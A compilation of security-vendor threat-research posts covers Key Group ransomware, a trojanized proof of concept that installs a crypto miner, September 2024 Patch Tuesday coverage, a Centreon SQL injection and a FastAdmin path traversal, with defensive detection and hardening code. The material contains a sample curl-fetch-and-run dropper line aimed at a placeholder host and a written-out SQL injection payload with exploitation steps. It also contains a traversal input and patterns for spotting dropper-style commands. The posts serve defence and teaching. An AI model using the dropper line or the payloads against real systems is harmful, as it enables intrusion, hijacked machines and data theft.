Key Group Russian Ransomware Gang Uses Extensive Multi-purpose Telegram Channel

The SonicWall Capture Labs threat research team has recently been tracking ransomware operated by a group known as Key Group. Key Group is a Russia-based threat group formed in early 2023. It has reportedly attacked organizations around the world, encrypting files and exfiltrating data before using Telegram channels to negotiate ransom payments. The malware is written in .NET and is built with the Chaos ransomware builder.

Infection Cycle

Upon infection, files on the system are encrypted and each file name is given an additional extension consisting of five random alphanumeric characters.

Disassembling the file reveals a list of targeted file types:

Figure 1: Targeted files

We can also see a list of processes which will be killed if running:

Figure 2: Targeted processes to kill

It disables system recovery:

Figure 3: Disables system recovery

It contains a whitelist of files to ignore:

Figure 4: Whitelisted files

After encrypting files, the following message is displayed on the desktop background:

Figure 5: Desktop message

The following files are written to the filesystem:

C:\SystemID\keygroup777.txt

C:\SystemID\PersonalID.txt.UF4TA

keygroup777.inf does not exist on the infected system, but Keygroup777.txt does. It contains the following ransom message:

Figure 6: Ransom note
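
The two file artifacts above (the ransom note under C:\SystemID and the five-character extension appended to every encrypted file) are enough to build a simple host triage check. The following is an added example, not code from the original analysis: it scans a list of paths, flags the note and counts files sharing one appended tag. The directory listing is constructed for the example; the assumption that a single victim receives a single tag is the example's own and is not stated above.

```python
import re
from collections import Counter

# Constructed sample directory listing (not from the original analysis). The
# ransom-note path and the PersonalID.txt.UF4TA name are the ones reported above;
# the user files are invented to show what an encrypted tree looks like.
SAMPLE_PATHS = [
    r"C:\SystemID\keygroup777.txt",
    r"C:\SystemID\PersonalID.txt.UF4TA",
    r"C:\Users\alice\Documents\budget.xlsx.UF4TA",
    r"C:\Users\alice\Documents\notes.txt.UF4TA",
    r"C:\Users\alice\Pictures\holiday.jpg.UF4TA",
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Users\alice\Documents\readme.txt",
]

# Ransom note dropped by this sample.
RANSOM_NOTE = re.compile(r"\\SystemID\\keygroup777\.txt$", re.IGNORECASE)
# <original name>.<original extension>.<five alphanumerics>: the Chaos-style rename.
CHAOS_RENAME = re.compile(r"^(?P<orig>.+\.[A-Za-z0-9]{1,5})\.(?P<tag>[A-Za-z0-9]{5})$")


def classify(paths):
    """Split a path list into ransom notes and (path, tag) pairs for renamed files."""
    notes = [p for p in paths if RANSOM_NOTE.search(p)]
    tagged = []
    for p in paths:
        name = p.rsplit("\\", 1)[-1]
        m = CHAOS_RENAME.match(name)
        if m:
            tagged.append((p, m.group("tag")))
    return notes, tagged


def assess(paths, min_tagged=3):
    """Flag a host when the note is present or many files share one appended tag.

    A lone file ending in five alphanumerics (e.g. build.v1.final) is noise; many
    files sharing the same tag is the ransomware signal. One tag per victim is an
    assumption of this example.
    """
    notes, tagged = classify(paths)
    tags = Counter(tag for _, tag in tagged)
    dominant_tag, count = tags.most_common(1)[0] if tags else (None, 0)
    return {
        "ransom_notes": notes,
        "extension": dominant_tag,
        "encrypted_count": count,
        "suspicious": bool(notes) or count >= min_tagged,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_PATHS))
```

Feed it the output of a recursive directory listing from the suspect host; the returned extension is the value to search for across file shares when scoping the incident.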

The first Github.io link leads to the following page:

Figure 7: First Github link

The “Login” button leads to the following page:

Figure 8: After “Log in”

It automatically redirects to the following page:

Figure 9: Redirected page

The last link in the ransom note leads to the following webpage:

Figure 10: Key Group ransom page

Figure 11: The ransom page continued

@SpyWareSpyNet and keygroup777Rezerv1 are handles used to communicate with the operators on the Telegram messaging platform.

The two buttons lead to the following pages:

Figure 12: “About yourself” button

Figure 13: “Satana” button

The page above plays an audio track called T.A.t.i (feat. Ddeks) by ЧИЧ.

The @SpyWareSpyNet Telegram handle leads to the following channel, which contains links that eventually lead to the contact information of various operators:

Figure 14: Telegram channel for operator communication

Figure 15: Operator contact information

The Telegram channels are also used by many operators to share information on victims, contact information, tools and more.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Keygroup777.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hold – Verify – Execute: Rise of Malicious POCs Targeting Security Researchers

As seen in Cybersecurity Insiders.

Overview

While investigating CVE-2024-5932, a code injection vulnerability in the GiveWP WordPress plugin, our team encountered a malicious proof of concept (POC) targeting cybersecurity professionals. Trojanized POCs have become a growing threat: threat actors use them to achieve goals such as crypto mining, data exfiltration and backdoor installation. We have dissected the instance we encountered and are sharing it to raise awareness of the problem. While security researchers are usually well equipped to detect this kind of trick, it is easy to become overconfident, and overconfidence leads to compromise.

Security researchers often need to run publicly available POCs to accomplish their tasks, and GitHub is a hotspot for such POCs. POCs on GitHub are widely treated as reliable because they are easy to access and the site has a good reputation. Should defenders execute a script without thoroughly vetting it? The following sections explain why researchers must be extra vigilant when using such scripts. For the specific example in this blog, SonicWall has released the signature IPS: 4496 XMRig Crypto Mining Activity to protect our customers. It is important to recognize that the larger threat is not this one example but the technique being used to target security researchers.

Analysis of a Real-world Sample

Initially, there was only a single POC for CVE-2024-5932, published by EQSTLab, which is legitimate. Within a few hours, however, a couple of similar repositories appeared that at first glance looked like replicas of the original. The links to those repositories (since taken down) are as follows.

http[s]://github[.]com/niktoproject/CVE-2024-5932 (malicious repo)
http[s]://github[.]com/sqlmap-projects/CVE-2024-5932 (malicious repo)

A screenshot of one of the instances can be seen in Figure 1.

Figure 1: Screengrab of the malicious POC repository

Although such copycat repositories are not unusual, we dug into them out of curiosity and found a discreetly added block of malicious code in the script, as seen in Figure 2.

Figure 2: Evil code from POC script

This malicious code runs the first time the victim executes the script and performs the following tasks.

  • It downloads a second script from the repository (http[s]://github[.]com/niktoproject/c/blob/main/c[.]sh – malicious), which contains the crypto mining logic.
  • It makes the script executable and runs it.
  • It deletes the script.
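
The three steps above (fetch, make executable and run, delete) are a recognizable shape, and a researcher can check for it before running anything. The following is an added example, not part of the original post: a small static vetter that scans a script's text for download, chmod, shell-execution and self-deletion patterns and returns HOLD when fetch and execution appear together. Both sample scripts are constructed for the example; the endpoint and the example.invalid URL are placeholders, not the real POC or payload.

```python
import re

# Each rule is (label, pattern). Together they cover what a trojanized POC needs
# to fetch, run and remove a second-stage script.
SUSPICIOUS = [
    ("remote fetch",    re.compile(r"\b(curl|wget)\b[^\n]*https?://|\bgit\s+clone\s+https?://")),
    ("made executable", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("shell execution", re.compile(r"\b(os\.system|subprocess\.(run|call|Popen|check_output))\s*\(|\b(ba)?sh\s+-c\b")),
    ("self-deletion",   re.compile(r"\brm\s+(-[rf]+\s+)?\S+")),
    ("encoded payload", re.compile(r"\bbase64\s+(-d|--decode)\b|\bb64decode\s*\(")),
]

# Constructed samples (placeholder endpoint and URL; not the real POC or payload).
CLEAN_POC = """import requests
import sys

def exploit(target):
    # proof-of-concept request against the vulnerable endpoint (placeholder)
    r = requests.post(target + "/vulnerable-endpoint", data={"id": "1"})
    return r.status_code
"""

TROJANIZED_POC = CLEAN_POC + """
import os
# hidden dropper: fetch a second script, run it, remove the evidence
os.system("curl -s https://example.invalid/c.sh -o /tmp/c.sh && chmod +x /tmp/c.sh && /tmp/c.sh; rm -f /tmp/c.sh")
"""


def vet_script(text):
    """Return (line_number, label, line) for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in SUSPICIOUS:
            if rx.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


def verdict(text):
    """HOLD when fetch and execution appear together (the dropper shape), REVIEW on any hit."""
    labels = {label for _, label, _ in vet_script(text)}
    if {"remote fetch", "shell execution"} <= labels:
        return "HOLD"
    return "REVIEW" if labels else "PASS"


if __name__ == "__main__":
    for name, text in (("clean", CLEAN_POC), ("trojanized", TROJANIZED_POC)):
        print(name, verdict(text), vet_script(text))
```

A REVIEW verdict is not a conviction: a legitimate POC may well shell out. The point is to make the reviewer read the flagged line before the script runs, and to diff the copy against the original author's repository.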

The downloaded script, which uses the XMRig miner to mine Monero, can be seen in Figure 3.

Figure 3: Crypto mining code

The above code performs the following tasks.

  • Downloads the miner and saves the executable as a hidden file in a hidden directory at /home/<user_name>/.xconfig/.x
  • Collects information about the machine's resources, such as RAM and CPU, to use as a unique identifier
  • Creates a cron job so the mining process persists across reboots
  • Cleans up temporary files to avoid suspicion
  • Executes the miner

Indicators of Compromise (IOCs)

If someone has (accidentally) executed the malicious script, the infection can be identified using the indicators below.

  • Look for a process named “.x” consuming most of the machine's resources, as seen in Figure 4.

Figure 4: Crypto mining process

  • Check the cron job list for the malicious entry
  • Look for outgoing network connections to the port specified in the script, as seen in Figure 5

Figure 5: Network connection originated by mining process

Steps to Remove the Miner

The following steps remove the miner.

  • Kill the “.x” process shown in Figure 4
  • Delete the miner executable from /home/<user_name>/.xconfig/.x
  • Remove the cron job
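
The indicators and removal steps above can be turned into a repeatable check. The following is an added example, not code from the original post: it parses process and crontab output, matches the “.x” process name and the /home/<user>/.xconfig/.x path, and emits the removal steps in the order listed above. The ps and crontab output is constructed; the pool host and port in the sample are placeholders, since the post does not name the real ones.

```python
import re

# Constructed output (not captured from a real infection) shaped like
# `ps -eo pid,pcpu,user,comm,args` and `crontab -l`. The pool host and port are
# placeholders.
PS_SAMPLE = """  PID %CPU USER     COMMAND         COMMAND
    1  0.0 root     systemd         /sbin/init
  842  0.3 alice    bash            bash
 1337 98.7 alice    .x              /home/alice/.xconfig/.x -o pool.example.invalid:3333 --donate-level 1
 2001  1.2 alice    firefox         /usr/lib/firefox/firefox
"""

CRON_SAMPLE = """# m h dom mon dow command
0 3 * * * /home/alice/bin/backup.sh
@reboot /home/alice/.xconfig/.x > /dev/null 2>&1
*/5 * * * * /home/alice/.xconfig/.x
"""

# Hidden directory and hidden file the dropper writes (path reported above).
MINER_PATH = re.compile(r"/home/[^/\s]+/\.xconfig/\.x\b")


def find_miner_processes(ps_text, cpu_threshold=50.0):
    """Match on the process name '.x' or on the miner path in the arguments."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, pcpu, user, comm, args = parts
        if comm == ".x" or MINER_PATH.search(args):
            hits.append({"pid": int(pid), "cpu": float(pcpu), "user": user,
                         "args": args, "hot": float(pcpu) >= cpu_threshold})
    return hits


def find_miner_cron(cron_text):
    """Return the crontab lines that re-launch the miner (the persistence step)."""
    return [ln for ln in cron_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and MINER_PATH.search(ln)]


def cleanup_plan(ps_text, cron_text):
    """Turn the findings into the removal steps listed above, in order."""
    procs = find_miner_processes(ps_text)
    cron = find_miner_cron(cron_text)
    steps = [f"kill -9 {p['pid']}" for p in procs]
    paths = set()
    for p in procs:
        m = MINER_PATH.search(p["args"])
        if m:
            paths.add(m.group(0))
    steps += [f"rm -f {path}" for path in sorted(paths)]
    if cron:
        steps.append("crontab -l | grep -v '/.xconfig/.x' | crontab -")
    return steps


if __name__ == "__main__":
    for step in cleanup_plan(PS_SAMPLE, CRON_SAMPLE):
        print(step)
```

Run it against `ps -eo pid,pcpu,user,comm,args` and `crontab -l` from the affected user, and check the user crontab of every account on the box, not just the one that ran the POC. Confirm the mining connection is gone afterwards with `ss -tnp`.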

Best Practices

The following established practices help researchers improve their security posture.

  • Always use isolated VMs and networks for research.
  • Verify, then execute! Run scripts only after vetting them thoroughly.
  • Never use the host machine to test anything.
  • Check the “Issues” section of the suspected repository; other users may already have posted a warning.

Flagging on Social Media

Some researchers also flagged this issue on the social media platform X, as seen in the links below.

https://x.com/win3zz/status/1828704644987511107
https://x.com/nav1n0x/status/1828715567785636112

Conclusion

Although researchers will inevitably need to use public POCs, they should execute them with great caution to avoid consequences such as ransomware, data exfiltration, spoofing and botnet enrolment.

MITRE ATT&CK Mapping

  • Resource Development: T1588.005 Obtain Capabilities: Exploits
  • Initial Access: T1189 Drive-by Compromise
  • Execution: T1204.002 User Execution: Malicious File
  • Persistence: T1053.003 Scheduled Task/Job: Cron
  • Defense Evasion: T1070.004 Indicator Removal: File Deletion
  • Discovery: T1082 System Information Discovery
  • Impact: T1496 Resource Hijacking

Figure 6: MITRE ATT&CK mapping

Microsoft Security Bulletin Coverage For September 2024

Overview

Microsoft’s September 2024 Patch Tuesday addresses 79 vulnerabilities, of which 30 are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed Microsoft’s security advisories for September 2024 and has produced coverage for 9 of the reported vulnerabilities.

Vulnerabilities with Detections

CVE CVE Title Signature
CVE-2024-38217 Windows Mark of the Web Security Feature Bypass Vulnerability ASPY 7007 Malformed-lnk lnk.MP_5
CVE-2024-38237 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability ASPY 7004 Exploit-exe exe.MP_408
CVE-2024-38238 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 7005 Exploit-exe exe.MP_409
CVE-2024-38241 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 7006 Exploit-exe exe.MP_410
CVE-2024-38242 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 602 Exploit-exe exe.MP_411
CVE-2024-38243 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 603 Exploit-exe exe.MP_412
CVE-2024-38244 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 604 Exploit-exe exe.MP_413
CVE-2024-38245 Kernel Streaming Service Driver Elevation of Privilege Vulnerability ASPY 605 Exploit-exe exe.MP_414
CVE-2024-43461 Windows MSHTML Platform Spoofing Vulnerability IPS 4501 Windows MSHTML Platform Spoofing (CVE-2024-43461)

Release Breakdown

The vulnerabilities can be classified into the following categories:

For September there are 7 Critical, 71 Important and one Moderate vulnerability.

Microsoft tracks vulnerabilities that are being actively exploited at the time of disclosure and those that were publicly disclosed before the Patch Tuesday release each month. The chart above displays these metrics month by month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE CVE Title
CVE-2024-38230 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-38232 Windows Networking Denial of Service Vulnerability
CVE-2024-38233 Windows Networking Denial of Service Vulnerability
CVE-2024-38234 Windows Networking Denial of Service Vulnerability
CVE-2024-38235 Windows Hyper-V Denial of Service Vulnerability
CVE-2024-38236 DHCP Server Service Denial of Service Vulnerability
CVE-2024-43466 Microsoft SharePoint Server Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE CVE Title
CVE-2024-37341 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-37965 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-37980 Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2024-38014 Windows Installer Elevation of Privilege Vulnerability
CVE-2024-38046 PowerShell Elevation of Privilege Vulnerability
CVE-2024-38188 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability
CVE-2024-38194 Azure Web Apps Elevation of Privilege Vulnerability
CVE-2024-38216 Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38220 Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38225 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-38237 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38238 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38239 Windows Kerberos Elevation of Privilege Vulnerability
CVE-2024-38240 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
CVE-2024-38241 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38242 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38243 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38244 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38245 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38246 Win32k Elevation of Privilege Vulnerability
CVE-2024-38247 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38248 Windows Storage Elevation of Privilege Vulnerability
CVE-2024-38249 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38250 Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38252 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-38253 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-43457 Windows Setup and Deployment Elevation of Privilege Vulnerability
CVE-2024-43465 Microsoft Excel Elevation of Privilege Vulnerability
CVE-2024-43470 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability
CVE-2024-43492 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE CVE Title
CVE-2024-37337 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-37342 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-37966 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability
CVE-2024-38254 Windows Authentication Information Disclosure Vulnerability
CVE-2024-38256 Windows Kernel-Mode Driver Information Disclosure Vulnerability
CVE-2024-38257 Microsoft AllJoyn API Information Disclosure Vulnerability
CVE-2024-38258 Windows Remote Desktop Licensing Service Information Disclosure Vulnerability
CVE-2024-43458 Windows Networking Information Disclosure Vulnerability
CVE-2024-43474 Microsoft SQL Server Information Disclosure Vulnerability
CVE-2024-43475 Microsoft Windows Admin Center Information Disclosure Vulnerability
CVE-2024-43482 Microsoft Outlook for iOS Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE CVE Title
CVE-2024-21416 Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-26186 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-26191 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37335 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37338 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37339 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-37340 Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability
CVE-2024-38018 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38045 Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-38119 Windows Network Address Translation (NAT) Remote Code Execution Vulnerability
CVE-2024-38227 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38228 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38231 Windows Remote Desktop Licensing Service Denial of Service Vulnerability
CVE-2024-38259 Microsoft Management Console Remote Code Execution Vulnerability
CVE-2024-38260 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-38263 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43454 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43463 Microsoft Office Visio Remote Code Execution Vulnerability
CVE-2024-43464 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-43467 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
CVE-2024-43469 Azure CycleCloud Remote Code Execution Vulnerability
CVE-2024-43479 Microsoft Power Automate Desktop Remote Code Execution Vulnerability
CVE-2024-43491 Microsoft Windows Update Remote Code Execution Vulnerability
CVE-2024-43495 Windows libarchive Remote Code Execution Vulnerability

Security Feature Bypass Vulnerabilities

CVE CVE Title
CVE-2024-30073 Windows Security Zone Mapping Security Feature Bypass Vulnerability
CVE-2024-38217 Windows Mark of the Web Security Feature Bypass Vulnerability
CVE-2024-38226 Microsoft Publisher Security Features Bypass Vulnerability
CVE-2024-43487 Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE CVE Title
CVE-2024-43455 Windows Remote Desktop Licensing Service Spoofing Vulnerability
CVE-2024-43461 Windows MSHTML Platform Spoofing Vulnerability
CVE-2024-43476 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2024-23119: Critical SQL Injection Vulnerability in Centreon

Overview

The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability.

CVE-2024-23119 is a high-severity SQL injection vulnerability in Centreon, a widely used network, system and application monitoring tool, impacting Centreon Web versions prior to 22.10.17, 23.04.13, and 23.10.5. The issue resides in the insertGraphTemplate function, which fails to validate user input before incorporating it into SQL queries. As a result, an authenticated attacker can execute arbitrary SQL commands, potentially taking control of the database and executing code in the context of the service account. The vulnerability carries a CVSS base score of 8.8, reflecting its impact on confidentiality, integrity and availability. The Exploit Prediction Scoring System (EPSS) estimates a 0.07% chance of exploitation in the next 30 days, so exploitation is considered unlikely but still notable. The vulnerability was reported by the Zero Day Initiative (ZDI) as ZDI-CAN-22339 and has been addressed in Centreon Web versions 22.10.15, 23.04.10, and 23.10.1. For further details and mitigation, refer to the ZDI advisory and the Centreon GitHub repository.

Technical Overview

CVE-2024-23119 stems from an SQL injection flaw in the creation of graph templates. Centreon exposes a web interface over HTTP/HTTPS. The vulnerable code path runs through main.get.php (see Figure 1) into the formGraphTemplate.php script and the insertGraphTemplateInDB() function. The core issue is inadequate validation and sanitization of specific request parameters that are used to construct SQL queries.

Figure 1: Code Snippet from ‘main.get.php’

When a graph template is created, an HTTP POST request is sent to main.get.php with parameters including p, o and submitA. The formGraphTemplate.php script processes these parameters and invokes the insertGraphTemplateInDB() function (see Figure 2), which then calls insertGraphTemplate().

Figure 2: Code Snippet from ‘formGraphTemplate.php’

In this function, an SQL query is constructed to insert data into the giv_graphs_template table. While some parameters are sanitized, others, namely lower_limit, upper_limit, size_to_max, default_tpl1 and scaled, are incorporated directly into the SQL query without sanitization (see Figure 3), which permits an attacker to inject arbitrary SQL commands.

Figure 3: Code snippet from insertGraphTemplate() in DB-Func.php

Exploiting this SQL injection allows a remote, authenticated attacker to craft malicious requests that lead to data leakage, data corruption or full control of the database. It underlines the importance of rigorous input validation and parameterized queries in web applications.
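
The difference between the vulnerable INSERT and its parameterized form is easiest to see side by side. The following is an added example, not Centreon's code: a toy giv_graphs_template table with a reduced, assumed column set, the string-concatenated insert that mirrors the flaw, and the placeholder-based insert that fixes it. SQLite is used so it runs offline; the payload is constructed with the same shape as the one shown later in the Exploitation section (close the VALUES clause, stack a statement, comment out the tail), with SQLite's -- comment in place of MySQL's #.

```python
import sqlite3

# Toy stand-in for Centreon's giv_graphs_template (assumed, reduced column set).
SCHEMA = "CREATE TABLE giv_graphs_template (name TEXT, lower_limit TEXT, upper_limit TEXT)"

# Constructed payload for the lower_limit field: closes the VALUES clause, stacks a
# second statement, and comments out the rest of the original query.
PAYLOAD = "1', '0'); CREATE TABLE poc (id int); --"


def insert_unsafe(conn, name, lower_limit, upper_limit):
    """Mirrors the flaw: request values concatenated straight into the SQL text."""
    sql = ("INSERT INTO giv_graphs_template (name, lower_limit, upper_limit) "
           f"VALUES ('{name}', '{lower_limit}', '{upper_limit}')")
    # executescript runs stacked statements, like a multi-statement MySQL driver would.
    conn.executescript(sql)
    return sql


def insert_safe(conn, name, lower_limit, upper_limit):
    """Hardened form: placeholders; the driver sends values as data, never as SQL."""
    conn.execute(
        "INSERT INTO giv_graphs_template (name, lower_limit, upper_limit) VALUES (?, ?, ?)",
        (name, lower_limit, upper_limit),
    )
    conn.commit()


def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


def demo(safe):
    """Run the same attacker-controlled lower_limit through one of the two inserts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    (insert_safe if safe else insert_unsafe)(conn, "tpl", PAYLOAD, "100")
    stored = conn.execute("SELECT lower_limit FROM giv_graphs_template").fetchone()[0]
    return {"poc_table_created": table_exists(conn, "poc"), "stored_lower_limit": stored}


if __name__ == "__main__":
    print("unsafe:", demo(safe=False))
    print("safe:  ", demo(safe=True))
```

In the unsafe path the stored lower_limit is just "1" and a poc table now exists; in the safe path the whole payload is stored verbatim as a string and no second statement ever runs. Numeric columns should additionally be cast to int before binding, so a non-numeric value is rejected rather than stored.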

Triggering the Vulnerability

  • Send malicious POST requests: An attacker triggers the vulnerability by sending a specially crafted HTTP POST request to the Centreon web interface, with SQL payloads in the parameters that are not properly sanitized.
  • Exploit unsanitized parameters: The vulnerability arises from insufficient input validation of the lower_limit, upper_limit, size_to_max, default_tpl1 and scaled parameters. An attacker triggers it by injecting SQL into these parameters when creating or modifying graph templates.
  • Access via the graph template interface: The attack must go through the graph template creation or modification interface, specifically by setting the request parameter p to “20404” along with the other relevant parameters, to reach the vulnerable code path.
  • Authenticated access required: The attacker must be logged in to the Centreon web interface with permissions to create or modify graph templates.

Exploitation

Exploiting CVE-2024-23119 involves a series of steps against the Centreon web management interface. The attacker first authenticates to the Centreon API by sending a POST request to the /api/latest/authentication/providers/configurations/local endpoint with a JSON payload containing valid credentials.

Figure 4: CSRF Token

Next, the attacker retrieves a CSRF token from the /main.get.php?p=20404&o=a endpoint (see Figure 4), which is required for subsequent form submissions; it is extracted from the HTML response with a regular expression. With the token in hand, the attacker crafts a payload for one of the unsanitized fields (lower_limit, upper_limit, size_to_max, default_tpl1 or scaled) in a graph template creation request. For example, the payload 1', NULL, 0, NULL, NULL, '0', NULL, NULL); CREATE TABLE poc (id int); # closes the original VALUES clause, appends a second statement that creates a table named poc, and comments out the remainder of the query.

Figure 5: Exploitation using SQL injection

Finally, the attacker sends the malicious request to the /main.get.php?p=20404 endpoint with the payload and necessary parameters, including the CSRF token. Upon successful execution of the payload, the attacker verifies the impact by checking the database for changes, such as the presence of the newly created table. This initial access can be leveraged for further exploitation, potentially leading to more severe consequences like data breaches or unauthorized access.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 20295 Centreon main.get.php SQL Injection 9

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Upgrade to Centreon Web version 22.10.15, 23.04.10 or 23.10.1, or later.
  • Monitor and review system logs for suspicious activity.
  • Utilize up-to-date IPS signatures to filter network traffic.
  • Restrict user privileges and sanitize user inputs.


CVE-2024-7928: FastAdmin Unauthenticated Path Traversal Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of an unauthenticated directory traversal vulnerability affecting FastAdmin installations. Identified as CVE-2024-7928 and carrying a moderate CVSSv3 score of 5.3, the vulnerability is more severe than it initially appears. Categorized as CWE-22 (path traversal), it allows unauthenticated attackers to read files outside the directory the application intends to serve.

A proof of concept is publicly available on GitHub. The vulnerability affects FastAdmin versions up to 1.3.3.20220121; an attacker can use the path traversal to retrieve database details and expose sensitive information. Users are strongly encouraged to update to version 1.3.4.20220530.

Technical Overview

FastAdmin is an open-source backend framework built on ThinkPHP and Bootstrap, offering features such as a complete permission management system and one-click CRUD generation. The CVE-2024-7928 PoC attempts to retrieve database credentials from FastAdmin instances. The issue can be exploited remotely, with low complexity and without authentication, and could lead to unauthorized access to sensitive data.

Figure 1 shows the path traversal being exploited with a crafted GET request to the /index/ajax/lang URI, manipulating the “lang” argument.

Figure 1: CVE-2024-7928 attack request

Exploiting the vulnerability

A single crafted GET request to a vulnerable FastAdmin instance is necessary and sufficient to exploit the issue; the attacker only needs network access to the instance, whether over the Internet or a local network. The publicly available PoC sends exactly such a request. Figure 2 demonstrates exploitation using that PoC.

Figure 2: CVE-2024-7928 Exploitation

Once the exploit succeeds, the attacker can use the stolen credentials with a MySQL client to access, manipulate and expose sensitive information, as shown in Figure 3.

Figure 3: CVE-2024-7928 post exploitation
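
The root cause of a CWE-22 bug like this one is a user-supplied language name landing in a file path. The following is an added example, not FastAdmin's code: a vulnerable lookup that joins the decoded “lang” value onto the language directory, beside a hardened version that allowlists the value and then checks the resolved path still sits inside that directory. The application layout (a lang/ directory of .js files and a config file holding a secret) is constructed for the example and is not a description of FastAdmin's real file structure.

```python
import os
import re
import tempfile
from urllib.parse import unquote

LANG_DIR = "lang"
# Language codes look like "en", "zh-cn" or "pt_BR"; nothing else is acceptable.
LANG_CODE = re.compile(r"[A-Za-z]{2,3}([-_][A-Za-z]{2,4})?")


def make_demo_tree():
    """Constructed application tree: one language file and one config file with a secret."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    os.makedirs(os.path.join(root, LANG_DIR))
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, LANG_DIR, "en.js"), "w") as f:
        f.write("window.lang = {};")
    with open(os.path.join(root, "config", "database.txt"), "w") as f:
        f.write("password = s3cret")
    return root


def read_lang_unsafe(root, lang):
    """Vulnerable shape: the decoded request value goes straight into the path."""
    path = os.path.join(root, LANG_DIR, unquote(lang))
    with open(path) as f:
        return f.read()


def read_lang_safe(root, lang):
    """Hardened form: allowlist the value, then confirm the resolved path stays inside lang/."""
    lang = unquote(lang)
    if not LANG_CODE.fullmatch(lang):
        raise ValueError("invalid language code")
    base = os.path.realpath(os.path.join(root, LANG_DIR))
    target = os.path.realpath(os.path.join(base, lang + ".js"))
    # realpath() resolves '..' and symlinks before the containment check, so the
    # check holds even if the allowlist is later loosened.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes language directory")
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    root = make_demo_tree()
    print("unsafe:", read_lang_unsafe(root, "..%2Fconfig%2Fdatabase.txt"))
    try:
        read_lang_safe(root, "..%2Fconfig%2Fdatabase.txt")
    except ValueError as e:
        print("safe:", e)
```

The allowlist alone would stop this bug; the containment check is kept as a second layer because allowlists tend to grow over time. Decode the parameter exactly once before validating, so an encoded “..%2F” is judged in the same form the filesystem will see.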

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:20259 – FastAdmin Path Traversal
